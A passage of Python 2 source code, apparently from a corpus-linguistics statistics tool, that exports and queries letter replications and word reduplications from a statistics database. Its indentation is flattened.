status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Exported: {}:'{}'; Rows: '{}'; ".format(tag, status_bar_current.count,exported_rows_count) ), "", counter_format=self.status_bars_manager.term.bold_white_on_green('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
else:
# p("!88888")
if not header:
self.logger.error("Header is empty. Please give non-empty header.")
yield False
return
try:
repl = True if header["repl"] else False
redu = True if header["redu"] else False
baseline = True if header["baseline"] else False
except:
self.logger.error("Header has wrong structure. Please give header with the right structure. Probably was selected not correct 'output_table_type'. ")
yield False
return
#p((header, repl, redu, baseline))
#Stats.header_order_to_export
# p("!7777")
data = self.get_data(inp_syntagma=inp_syntagma,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=stemmed_search,send_empty_marker=True,
minimum_columns=False,order_output_by_syntagma_order=False, return_full_tuple=False,delete_duplicates=True,
get_columns_repl=False,get_columns_redu=False,get_columns_baseline=False,if_type_pos_return_lexem_syn=True)
#p(len(data), "dd")
# p((inp_syntagma, repl, redu,baseline, syntagma_type, sentiment, thread_name,max_scope, stemmed_search,), c="r")
if not data:
self.logger.error("Current Generator wasn't initialized. Because No Data was found in the current StatsDB for current settings. Please try to change the settings.")
yield False
return
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("Exporter (exhausted)") , "", counter_format=self.status_bars_manager.term.bold_white_on_green("{fill}{desc}{fill}"))
status_bar_start.refresh()
status_bar_current_all = self._get_new_status_bar(self.statsdb.rownum("baseline"), "All:", "syntagma")
#p(len(data), "dd")
status_bar_current_right = self._get_new_status_bar(len(data), "Qualified:", "syntagma")
status_bar_current_all.refresh()
status_bar_current_right.refresh()
# p("!666")
ix_baseline = self.col_index_orig["baseline"]
ix_repl = self.col_index_orig["repl"]
ix_redu = self.col_index_orig["redu"]
ix_repl_in_redu = ix_repl["in_redu"]
ix_redu_in_redufree = ix_redu["index_in_redufree"]
ix_doc_id_repl = ix_repl["doc_id"]
ix_doc_id_redu = ix_redu["doc_id"]
ix_redu_id = ix_redu["id"]
i = 0
exported_rows_count = 0
# p("!555")
# p(data, "data")
count = 0
for i, item in enumerate(data):
if item == None:
count += 1
# p((i,count))
#p((i, item))
# p(item, "item")
if not item:
if self._status_bar:
status_bar_current_all.update(incr=1)
continue
i += 1
# p("!444")
if self._status_bar:
status_bar_current_all.update(incr=1)
status_bar_current_right.update(incr=1)
#if inp_syntagma == ["klitze, kleine"]:
# p(item, "item")
#p(item , "item")
#temp_rows = []
#### Prepare Baseline
vals_bas = item["baseline"]
if not vals_bas:
self.logger.error("'baseline'-Element is empty. (syntagma: '{}')".format(item["syntagma"]))
yield False
break
#ret
#p(vals_bas, "vals_bas")
#p(header["baseline"],'header["baseline"]')
if len(vals_bas)> 1:
#p(vals_bas, "vals_bas")
self.logger.error( "Baseline Element has more as 1 item. If you searching in 'pos' and you got this error, please select 'if_type_pos_return_lexem_syn'-option to ensure right work. ")
yield False
return
vals_bas = vals_bas[0]
#p(vals_bas,"vals_bas")
#current_ordered_baseline_row = [ " || ".join(vals_bas[ix_baseline[col_name]]) if col_name in ["syntagma", "stemmed"] else vals_bas[ix_baseline[col_name]] for col_name in header["baseline"]]
current_ordered_baseline_row = []
for col_name in header["baseline"]:
if col_name == "syntagma":
current_ordered_baseline_row.append(separator_syn.join(vals_bas[ix_baseline[col_name]]))
elif col_name == "stemmed":
current_ordered_baseline_row.append(separator_syn.join(vals_bas[ix_baseline[col_name]].split(self._baseline_delimiter)))
else:
current_ordered_baseline_row.append(vals_bas[ix_baseline[col_name]])
#p(current_ordered_baseline_row, "current_ordered_baseline_row")
### Prepare Other Data
if repl:
#temp_row = []
vals_repl = item["repl"]
if not vals_repl:
if redu:
vals_redu = item["redu"]
if vals_redu: # if just redus was found, but not repls for current syntagma, than extract just redus
for single_redu in vals_redu:
exported_rows_count += 1
yield tuple(redu_constr(single_redu))[0]
#vals_redu_dict = {singl_redu[ix_doc_id_redu]:{} for singl_redu in vals_redu}
#return
if redu:
vals_redu = item["redu"]
vals_redu_dict = defaultdict(lambda:defaultdict(None))
redu_ids = defaultdict(dict)
for singl_redu in vals_redu:
redu_doc_id = singl_redu[ix_doc_id_redu]
redu_index = singl_redu[ix_redu_in_redufree]
redu_ids[singl_redu[ix_redu_id]] = (singl_redu[ix_doc_id_redu], singl_redu[ix_redu_in_redufree])
vals_redu_dict[redu_doc_id][redu_index] = singl_redu
#vals_redu_dict = {singl_redu[ix_doc_id_redu]:{} for singl_redu in vals_redu}
#temp_data = []
extracted_redus= set()
for single_repl in vals_repl:
temp_row = []
#p(single_repl, "single_repl", c="r")
#for
for table_part in Stats.header_order_to_export:
if table_part == "baseline":
temp_row += current_ordered_baseline_row
elif table_part == "document":
#p(header["document"])
temp_row += [single_repl[ix_repl[col_name]] for col_name in header["document"][0]]
doc_id = single_repl[ix_doc_id_repl]
col_from_corp = header["document"][1]
#p(col_from_corp, "col_from_corp", c="g")
if col_from_corp:
values_from_corp = self._get_values_from_doc(doc_id, col_from_corp)
#p(values_from_corp, "values_from_corp")
if values_from_corp:
temp_row += list(values_from_corp)
else:
self.logger.error("No values from Corpus was returned")
yield False
return
elif table_part == "word":
temp_row += [single_repl[ix_repl[col_name]] for col_name in header["word"]]
elif table_part == "repl":
temp_row += [single_repl[ix_repl[col_name]] for col_name in header["repl"]]
elif table_part == "redu":
if redu:
in_redu = single_repl[ix_repl_in_redu]
if in_redu:
if not vals_redu: # if wasn't found - than re-exctract with other flag
current_syntagma = vals_bas[ix_baseline["syntagma"]]
#p((in_redu,single_repl, vals_redu,current_syntagma))
vals_redu = self._get_data_for_one_syntagma(current_syntagma,redu=True, repl=False, baseline=False,get_also_non_full_repetativ_result=True)["redu"]
#p(vals_redu, "22vals_redu")
vals_redu_dict = defaultdict(lambda:defaultdict(None))
for singl_redu in vals_redu:
vals_redu_dict[singl_redu[ix_doc_id_redu]][singl_redu[ix_redu_in_redufree]] = singl_redu
if not vals_redu:
self.logger.error("ImplementationError: No redus was extracted for '{}'-syntagma. ".format(current_syntagma))
yield False
return
repl_doc_id = single_repl[ix_doc_id_repl]
#p((single_repl))
#p(vals_redu_dict[repl_doc_id].keys(), "111redu_ixs")
try:
redu_for_current_repl = vals_redu_dict[repl_doc_id][in_redu]
except KeyError:
current_syntagma = vals_bas[ix_baseline["syntagma"]]
#!!!!!!!p((in_redu,single_repl, vals_redu,current_syntagma))
vals_redu = self._get_data_for_one_syntagma(current_syntagma,redu=True, repl=False, baseline=False,get_also_non_full_repetativ_result=True)["redu"]
#p(vals_redu, "22vals_redu")
vals_redu_dict = defaultdict(lambda:defaultdict(None))
for singl_redu in vals_redu:
vals_redu_dict[singl_redu[ix_doc_id_redu]][singl_redu[ix_redu_in_redufree]] = singl_redu
if not vals_redu:
self.logger.error("ImplementationError: No redus was extracted for '{}'-syntagma. ".format(current_syntagma))
yield False
return
#p((single_repl))
#p(vals_redu_dict[repl_doc_id].keys(), "222redu_ixs")
redu_for_current_repl = vals_redu_dict[repl_doc_id][in_redu]
if not redu_for_current_repl: # if wasn't found - than re-exctract with other flag
self.logger.error("DB-Inconsistence or ImplementationError: For Current Repl ('{}') in Redu ('{}') wasn't found any redu in the StatsDB.".format(single_repl, in_redu))
yield False
return
temp_row += [redu_for_current_repl[ix_redu[col_name]] for col_name in header["redu"]]
extracted_redus.add(redu_for_current_repl[ix_redu_id])
else:
temp_row += [None for col_name in header["redu"]]
elif table_part == "context":
temp_row += [single_repl[ix_repl[col_name]] for col_name in header["context"]]
exported_rows_count += 1
#p(temp_row, "temp_row")
yield temp_row
## for redus, which still be not extracted
if redu:
for r_id, data in redu_ids.items():
if r_id not in extracted_redus:
redu_to_extract = vals_redu_dict[data[0]][data[1]]
exported_rows_count += 1
#p(tuple(redu_constr(redu_to_extract))[0], c="r")
yield tuple(redu_constr(redu_to_extract))[0]
elif not repl and redu:
temp_row = []
vals_redu = item["redu"]
if not vals_redu:
self.logger.error("'redu'-Element is empty. (syntagma: '{}')".format(item["syntagma"]))
yield False
#return
for single_redu in vals_redu:
temp_row = []
for table_part in Stats.header_order_to_export:
if table_part == "baseline":
temp_row += current_ordered_baseline_row
elif table_part == "document":
#p(header["document"])
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["document"][0]]
col_from_corp = header["document"][1]
doc_id = single_redu[ix_doc_id_redu]
if col_from_corp:
values_from_corp = self._get_values_from_doc(doc_id, col_from_corp)
if values_from_corp:
temp_row += list(values_from_corp)
else:
self.logger.error("No values from Corpus was returned")
yield False
return
elif table_part == "word":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["word"]]
elif table_part == "redu":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["redu"]]
elif table_part == "context":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["context"]]
exported_rows_count += 1
yield temp_row
elif not redu and not repl:
self.logger.error("No one Phanomena was selected. Please select Redu or Repls to export.")
yield False
return
if self._status_bar:
# i += 1
# print status_bar_current_right.total, count, i
# if status_bar_current_right.total != count:
# status_bar_current_right.total = i
# status_bar_current_right.refresh()
#p((status_bar_current_all.total, status_bar_current_all.count))
if status_bar_current_all.total != status_bar_current_all.count:
status_bar_current_all.count = status_bar_current_all.total #= status_bar_current_all.count
status_bar_current_all.refresh()
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Exported: Syntagmas:'{}'; Rows: '{}'; ".format(status_bar_current_right.count,exported_rows_count) ), "", counter_format=self.status_bars_manager.term.bold_white_on_green('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
#p(i, "i")
if i == 0:
self.logger.critical("No Data was found for current settings. Please try to change the settings.")
yield False
return
def _check_exist_columns_to_get(self, get_columns_repl, get_columns_redu,get_columns_baseline):
status = True
if get_columns_repl:
columns_from_db = self.statsdb.col("replications")
for col in get_columns_repl:
if col not in columns_from_db:
self.logger.error("'{}'-column is not exist in 'replications'-Table. ".format(col) )
status = False
if get_columns_redu:
columns_from_db = self.statsdb.col("reduplications")
for col in get_columns_redu:
if col not in columns_from_db:
self.logger.error("'{}'-column is not exist in 'reduplications'-Table. ".format(col) )
status = False
if get_columns_baseline:
columns_from_db = self.statsdb.col("baseline")
for col in get_columns_baseline:
if col not in columns_from_db:
self.logger.error("'{}'-column is not exist in 'baseline'-Table. ".format(col) )
status = False
return status
def _convert_cols_to_indexes(self, get_columns_repl,get_columns_redu,get_columns_baseline,indexes):
indexes_to_get_repl = []
indexes_to_get_redu = []
indexes_to_get_baseline = []
if get_columns_repl:
ix = indexes["repl"]
for col in get_columns_repl:
indexes_to_get_repl.append(ix[col])
if get_columns_redu:
ix = indexes["redu"]
for col in get_columns_redu:
indexes_to_get_redu.append(ix[col])
if get_columns_baseline:
ix = indexes["baseline"]
for col in get_columns_baseline:
indexes_to_get_baseline.append(ix[col])
return indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline
#return ""
def _extract_certain_columns(self,data, indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline):
#pass
#indexes = self.col_index_min if minimum_columns else self.col_index_orig
if indexes_to_get_repl:
repls = data["repl"]
if repls:
new_repls = []
for repl in repls:
new_repls.append([repl[i] for i in indexes_to_get_repl])
data["repl"] = new_repls
if indexes_to_get_redu:
redus = data["redu"]
if redus:
new_redus = []
for redu in redus:
new_redus.append([redu[i] for i in indexes_to_get_redu])
data["redu"] = new_redus
if indexes_to_get_baseline:
baseline = data["baseline"]
if baseline:
new_baseline = []
for b in baseline:
new_baseline.append([b[i] for i in indexes_to_get_baseline])
data["baseline"] = new_baseline
return data
def compute_rep_sum(self,syntagma_to_search, reptype, syntagma_type="lexem",sentiment=False,
stemmed_search=False, thread_name="Thread0", ignore_num=False,ignore_symbol=False, word_examples_sum_table=True):
max_scope = 1
if reptype == "repl":
repl = True
redu = False
else:
repl = False
redu = True
num = self._get_row_num_in_baseline_with_rep(redu=redu, repl=repl, max_scope=max_scope)
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_current = self._get_new_status_bar(num, "Summarizing:", "syntagma")
#minimum_columns = True
if reptype == "repl":
collected_repls_from_corp = defaultdict(lambda:defaultdict(lambda: [[],None]))
get_columns_repl = ("doc_id","index_in_corpus","repl_letter", "repl_length", "rle_word", "pos")
### Step 1: Collect Data From Corpus
i = 0
for item in self.get_data(syntagma_to_search, repl=True, redu=False, baseline=False, get_columns_repl=get_columns_repl,
max_scope=max_scope,sentiment=sentiment,syntagma_type=syntagma_type,
stemmed_search=stemmed_search):
if self._status_bar:
status_bar_current.update(incr=1)
i+= 1
#p(item, "item")
#repls = item["repl"]
for repl in item["repl"]:
if ignore_num:
if repl[5] == "number":
continue
if ignore_symbol:
if repl[5] == "symbol":
continue
#p(repl, "repl")
collected_repls_from_corp[repl[0]][repl[1]][0].append((repl[2], repl[3]))
if word_examples_sum_table:
collected_repls_from_corp[repl[0]][repl[1]][1] = repl[4]
### Step 1: Compute Summ
if word_examples_sum_table:
summery = defaultdict(lambda:defaultdict(lambda:[0,defaultdict(lambda: 0) ]))
else:
summery = defaultdict(lambda:defaultdict(lambda:[0]))
for doc_id, doc_data in collected_repls_from_corp.iteritems():
for index_in_corpus , repl_container in doc_data.iteritems():
for repl in repl_container[0]:
#p(repl, "repl")
summery[repl[0]][repl[1]][0] += 1
if word_examples_sum_table:
summery[repl[0]][repl[1]][1][repl_container[1]] += 1
#p(word_examples_sum_table, "word_examples_sum_table")
if self._status_bar:
if status_bar_current.total != i:
#raise Exception, "PREDICED LEN IS NOT CORRECT IN SUM COMPUTER"
status_bar_current.total = i
if i == 0:
self.logger.error("('{}'-sum) Nothing was extracted for '{}'-syntagma. No Data was found for given settings.".format(reptype,syntagma_to_search))
return summery
else:
get_columns_redu = (db_helper.tag_normalized_word,"redu_length", "pos")
collected_redus_from_corp = defaultdict(lambda: defaultdict(lambda:0))
i = 0
#p((syntagma_to_search,max_scope, sentiment, syntagma_type, stemmed_search))
for item in self.get_data(syntagma_to_search, redu=True, repl=False, baseline=False, get_columns_redu=get_columns_redu, max_scope=max_scope,
sentiment=sentiment,syntagma_type=syntagma_type,stemmed_search=stemmed_search):
#p(item,"item")
i += 1
if self._status_bar:
status_bar_current.update(incr=1)
for redu in item["redu"]:
if ignore_num:
if redu[3] == "number":
continue
if ignore_symbol:
if redu[3] == "symbol":
continue
#p(redu)
collected_redus_from_corp[redu[0]][redu[1]] += 1
if self._status_bar:
if status_bar_current.total != i:
#raise Exception, "PREDICED LEN IS NOT CORRECT IN SUM COMPUTER"
status_bar_current.total = i
if i == 0:
self.logger.error("('{}'-sum) Nothing was extracted for '{}'-syntagma. No Data was found for given settings.".format(reptype,syntagma_to_search))
return collected_redus_from_corp
#p(collected_redus_from_corp, "collected_redus_from_corp")
def _get_row_num_in_baseline_with_rep(self, redu=False, repl=False, max_scope=False):
#p((redu, repl, max_scope))
if repl or redu:
rep_w_list = []
if repl:
w_repl = " occur_repl_uniq IS NOT NULL "
if self._full_repetativ_syntagma:
w_repl = "({} AND occur_full_syn_repl IS NOT NULL )".format(w_repl )
rep_w_list.append(w_repl)
if redu:
w_redu = " occur_redu_uniq IS NOT NULL "
if self._full_repetativ_syntagma:
w_redu = "({} AND occur_full_syn_redu IS NOT NULL )".format(w_redu)
rep_w_list.append(w_redu)
#if redu: rep_w_list.append(" occur_redu_uniq IS NOT NULL ")
where_str = "OR".join(rep_w_list)
where_str = "({})".format(where_str) if len(rep_w_list)>1 else where_str
if max_scope: where_str += " AND scope<={} ".format(max_scope)
where_str = where_str if where_str else False
#p(where_str,"where_str")
num= self.statsdb.rownum("baseline", where=where_str,connector_where="OR")
else:
num = 0
return num
def get_data(self,inp_syntagma="*",repl=False, redu=False, baseline=False, syntagma_type="lexem",
sentiment=False,thread_name="Thread0", max_scope=False, stemmed_search=False,send_empty_marker=False,
minimum_columns=False,order_output_by_syntagma_order=False, return_full_tuple=False,delete_duplicates=True,
get_columns_repl=False,get_columns_redu=False,get_columns_baseline=False,
if_type_pos_return_lexem_syn=False):
#p(inp_syntagma, "0inp_syntagma")
# p((inp_syntagma,repl,redu,baseline))
# p("..9999")
#p(locals())
if inp_syntagma == "*":
#p("..888")
return self._get_data(inp_syntagma=inp_syntagma,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=stemmed_search,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order,send_empty_marker=send_empty_marker,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates, if_type_pos_return_lexem_syn=if_type_pos_return_lexem_syn,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
else:
if thread_name not in self.preprocessors:
if not self._init_preprocessors(thread_name=thread_name):
self.logger.error("Error during Preprocessors initialization. Thread '{}' was stopped.".format(thread_name), exc_info=self._logger_traceback)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":"Error during Preprocessors initialization"})
self._terminated.value = True
return False
# p("..7777")
try:
inp_syntagma[0].decode # if iterator with just one syntagma
extract_type = 1
except AttributeError:
try:
inp_syntagma[0][0].decode #if iterator with just many different syntagma
extract_type = 2
except AttributeError as e:
self.logger.error("Given Syntagma '{}' has not correct format. Exception: '{}'.".format(inp_syntagma, repr(e)))
return False
except Exception as e:
self.logger.error(" Exception was throw: '{}'.".format( repr(e)))
return False
# p("..666")
if extract_type == 1:
#p("..555")
#p(inp_syntagma, "999999inp_syntagma")
gen = self._get_data(inp_syntagma=inp_syntagma,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=stemmed_search,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order,send_empty_marker=send_empty_marker,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,if_type_pos_return_lexem_syn=if_type_pos_return_lexem_syn,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
#p(len(gen), "num")
if not gen:
self.logger.error("Current Generator wasn't created")
return False
return gen
else:
#p("..444")
generators = []
#p(inp_syntagma, "1999999inp_syntagma")
#p(inp_syntagma, "2inp_syntagma")
not_init_gens = -1
for counter, inp_syn in enumerate(inp_syntagma):
gen = self._get_data(inp_syntagma=inp_syn,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=stemmed_search,send_empty_marker=send_empty_marker,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates, if_type_pos_return_lexem_syn=if_type_pos_return_lexem_syn,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
if not gen:
not_init_gens += 1
else:
#self.logger.error("Current Generator wasn't created")
#return False
generators.append(gen)
if counter == not_init_gens:
#p(not_init_gens)
self.logger.error("Not one generator was created!")
return False
#p(generators, "generators")
# p("..333")
num = sum([len(gen) for gen in generators])
#p(num, "num")
def intern_gen():
# p("..222")
for gen in generators:
if not gen:
yield False
return
for item in gen:
yield item
return LenGen(intern_gen(), num)
def _lexem_syn_extractor_from_pos(self, inp_syntagma, inpdata, repl=False, redu=False, baseline=False,
sentiment=False, minimum_columns=False,order_output_by_syntagma_order=False,
return_full_tuple=False,delete_duplicates=True,#send_empty_marker=False,
get_columns_repl=False,get_columns_redu=False,get_columns_baseline=False):
max_scope=False
stemmed_search=False
inpdata = list(inpdata)
if len(inpdata) > 1:
self.logger.error("The Length of given generator is more as 1.")
return False
elif len(inpdata) == 0:
self.logger.error("The Length of given generator is 0.")
return False
inpdata = inpdata[0]
if not inpdata:
return False
syn_len = len(inp_syntagma)
exctracted_baseline = [b for b in inpdata["baseline"] if len(b[0])==syn_len]
def intern_gen():
already_exported_syntagma = set()
for b in exctracted_baseline:
lexem_syn = b[0]
#p(lexem_syn, "1111lexem_syn", c="r")
data = self._get_data_for_one_syntagma(lexem_syn, repl=repl, redu=redu, baseline=baseline, syntagma_type="lexem", additional_pos_where=inp_syntagma,
sentiment=sentiment, max_scope=False,
for_optimization=False, stemmed_search=False, get_also_non_full_repetativ_result=False,
order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,
minimum_columns=minimum_columns, delete_duplicates=delete_duplicates,)
#p(data,">>>>data", c="c")
s = tuple(data["syntagma"])
if s in already_exported_syntagma:
continue
else:
already_exported_syntagma.add(s)
yield data
return LenGen(intern_gen(), len(exctracted_baseline))
def _get_data(self,inp_syntagma="*",repl=False, redu=False, baseline=False, syntagma_type="lexem",
sentiment=False,thread_name="Thread0", max_scope=False, stemmed_search=False, send_empty_marker=False,
minimum_columns=False,order_output_by_syntagma_order=False, return_full_tuple=False,delete_duplicates=True,
get_columns_repl=False,get_columns_redu=False,get_columns_baseline=False,if_type_pos_return_lexem_syn=False):
#print "111"
# p("---9999")
#p(inp_syntagma, "11inp_syntagma")
if not self._check_stats_db_should_exist():
return False
#if not isinstance(inp_syntagma, (list,tuple))
if syntagma_type not in Stats.supported_syntagma_type:
self.logger.error("Given SyntagmaType '{}' is not supported. Please select one of the following types: '{}'.".format(syntagma_type, Stats.supported_syntagma_type))
return False
if not inp_syntagma:
self.logger.error("NO InpSyntagma was given.")
return False
if sentiment and sentiment not in Stats.supported_sentiment:
self.logger.error("Given SentimentType '{}' is not supported. Please select one of the following types: '{}'. (!should be given in lower case!)".format(sentiment, Stats.supported_sentiment))
return False
indexes = self.col_index_min if minimum_columns else self.col_index_orig
if get_columns_repl or get_columns_redu or get_columns_baseline:
if not self._check_exist_columns_to_get( get_columns_repl, get_columns_redu,get_columns_baseline):
self.logger.error("Some given columns_to_get is not exist.")
return False
indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline = self._convert_cols_to_indexes(get_columns_repl,get_columns_redu,get_columns_baseline,indexes)
#print "2222"
# p("---888")
if not repl and not redu and not baseline:
self.logger.error("No Phenomena to export was selected. Please choice phenomena to export from the following list: '{}'. ".format(Stats.supported_phanomena_to_export))
return False
# p("---777")
if inp_syntagma == "*":
# p("---6666")
#print "333"
#p(inp_syntagma,"0000inp_syntagma")
num = self._get_row_num_in_baseline_with_rep(redu=redu, repl=repl, max_scope=max_scope)
#p(num, "num")
def intern_gen_all():
# p("---555")
#p(locals())
for baseline_container in self._baseline("*",max_scope=max_scope):
#inp_syntagma = self._preprocess_syntagma(inp_syntagma,thread_name=thread_name, syntagma_type=syntagma_type)
# p(max_scope, "max_scope")
# p(("---4444", baseline_container))
data = self._get_data_for_one_syntagma(baseline_container[0],repl=repl, redu=redu, baseline=False,
syntagma_type=syntagma_type, sentiment=sentiment,thread_name=thread_name, stemmed_search=False,
max_scope=max_scope, order_output_by_syntagma_order=order_output_by_syntagma_order,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,
minimum_columns=minimum_columns,indexes=indexes)
# p(("--333", data))
#if data:
# sys.exit()
if data:
if baseline:
data["baseline"] = (baseline_container,)
if get_columns_repl or get_columns_redu or get_columns_baseline:
data = self._extract_certain_columns(data, indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline)
yield data
else:
if data is False:
yield False
return
if send_empty_marker:
yield None
continue
return LenGen(intern_gen_all(), num)
#self._empty_marker = None
else:
# p("---222")
#print "444"
inp_syntagma = self._preprocess_syntagma(inp_syntagma,thread_name=thread_name, syntagma_type=syntagma_type, stemmed_search=stemmed_search)
if not inp_syntagma:
self.logger.error("Error by preprocessing of the InpSyntagma.")
return False
#p(inp_syntagma, "555inp_syntagma")
if stemmed_search:
#print "555"
#p(temp_syntagma, "temp_syntagma")
where_num = "stemmed='{}'".format(self._baseline_delimiter.join(inp_syntagma) )
num = self.statsdb.rownum("baseline", where=where_num)
def intern_gen_2():
scope = len(inp_syntagma)
where = tuple(self._get_where_statement(inp_syntagma,scope=scope,thread_name=thread_name, with_context=False,syntagma_type="lexem", sentiment=sentiment, stemmed_search=True))#, splitted_syntagma=splitted_syntagma)
if not where:
yield False
return
for baseline_container in self._baseline(inp_syntagma,where=where, minimum_columns=minimum_columns,max_scope=max_scope,split_syntagma=True):
#p(baseline_container, "baseline_container")
data = self._get_data_for_one_syntagma(baseline_container[0],repl=repl, redu=redu, baseline=False, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=False, stemmed_search=False,
order_output_by_syntagma_order=order_output_by_syntagma_order,minimum_columns=minimum_columns,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,indexes=indexes)
#p(data, "data")
if data:
data["baseline"] = (baseline_container,)
data["stem_syn"] = inp_syntagma
if get_columns_repl or get_columns_redu or get_columns_baseline:
data = self._extract_certain_columns(data, indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline)
#p(data, "data")
yield data
else:
if send_empty_marker:
yield None
#else:
# yield {}
if if_type_pos_return_lexem_syn and syntagma_type=="pos":
#p("if_type_pos_return_lexem_syn")
return self._lexem_syn_extractor_from_pos(inp_syntagma, intern_gen_all(),
repl=repl, redu=redu, baseline=baseline,
sentiment=sentiment,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
else:
return LenGen(intern_gen_2(), num)
else:
#print "666"
def inter_gen_3():
data = self._get_data_for_one_syntagma(inp_syntagma,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=False,
order_output_by_syntagma_order=order_output_by_syntagma_order,minimum_columns=minimum_columns,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,indexes=indexes)
if data:
if get_columns_repl or get_columns_redu or get_columns_baseline:
data = self._extract_certain_columns(data, indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline)
#p(data, "data")
yield data
else:
if send_empty_marker:
yield None
if if_type_pos_return_lexem_syn and syntagma_type=="pos":
#p("if_type_pos_return_lexem_syn")
return self._lexem_syn_extractor_from_pos(inp_syntagma,inter_gen_3(),
repl=repl, redu=redu, baseline=baseline,
sentiment=sentiment,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
else:
return LenGen(inter_gen_3(), 1)
def _get_data_for_one_syntagma(self,inp_syntagma_splitted, inp_syntagma_unsplitted=False,
repl=False, redu=False, baseline=False, syntagma_type="lexem", additional_pos_where=False,
sentiment=False,thread_name="Thread0", max_scope=False,
for_optimization=False, stemmed_search=False, get_also_non_full_repetativ_result=False,
#get_columns_repl=False, get_columns_redu=False,get_columns_baseline=False,
order_output_by_syntagma_order=False, return_full_tuple=False, output_type="list",
minimum_columns=False, delete_duplicates=True, indexes=False, ):#,splitted_syntagma=True):
#p((inp_syntagma_splitted, repl, redu, baseline,stemmed_search,additional_pos_where))
#p(locals())
scope = len(inp_syntagma_splitted)
if not self._is_syntagma_scope_right(scope):
#self.logger.error("The Length ('{}') of Given SyntagmaToSearch ('{}') is bigger as allow ('{}'). Please recompute StatsDB with the bigger ContextNumber.".format(scope, inp_syntagma_splitted,self._avaliable_scope))
#if isinstance()
return None
if stemmed_search:
inp_syntagma_splitted = self._preprocess_syntagma(inp_syntagma_splitted,thread_name=thread_name, syntagma_type=syntagma_type, stemmed_search=stemmed_search)
if inp_syntagma_unsplitted:
inp_syntagma_unsplitted = self._baseline_delimiter.join(inp_syntagma_splitted)
if not indexes:
indexes = self.col_index_min if minimum_columns else self.col_index_orig
#p(indexes, "indexes")
_repl = []
_redu = []
_baseline = []
#p(syntagma_type, "syntagma_type")
#p(scope,"scope2")
where1 = False
if repl:
if not where1:
where1 = tuple(self._get_where_statement(inp_syntagma_splitted,scope=scope,thread_name=thread_name,
with_context=True,syntagma_type=syntagma_type, sentiment=sentiment,
inp_syntagma_unsplitted=inp_syntagma_unsplitted,stemmed_search=stemmed_search,
additional_pos_where=additional_pos_where))#, splitted_syntagma=splitted_syntagma)
if not where1: return False
#p(where1,"where1_repl", c="b")
_repl = self.get_reps("repl",inp_syntagma_splitted,scope,where1,indexes,thread_name=thread_name, minimum_columns=minimum_columns,
order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,stemmed_search=False,
output_type=output_type,delete_duplicates=delete_duplicates,
syntagma_type=syntagma_type, for_optimization=for_optimization, get_also_non_full_repetativ_result=get_also_non_full_repetativ_result)
#p(_repl, "_repl")
# if get_columns_repl:
# if minimum_columns:
# self.logger.error("IllegalState: 'minimum_columns'-Option is True. It is not allow to get certain columns, if this option is true. Please switch off this option.")
# return {}
if redu:
if not where1:
where1 = tuple(self._get_where_statement(inp_syntagma_splitted,scope=scope,thread_name=thread_name, with_context=True,
syntagma_type=syntagma_type, sentiment=sentiment, inp_syntagma_unsplitted=inp_syntagma_unsplitted,
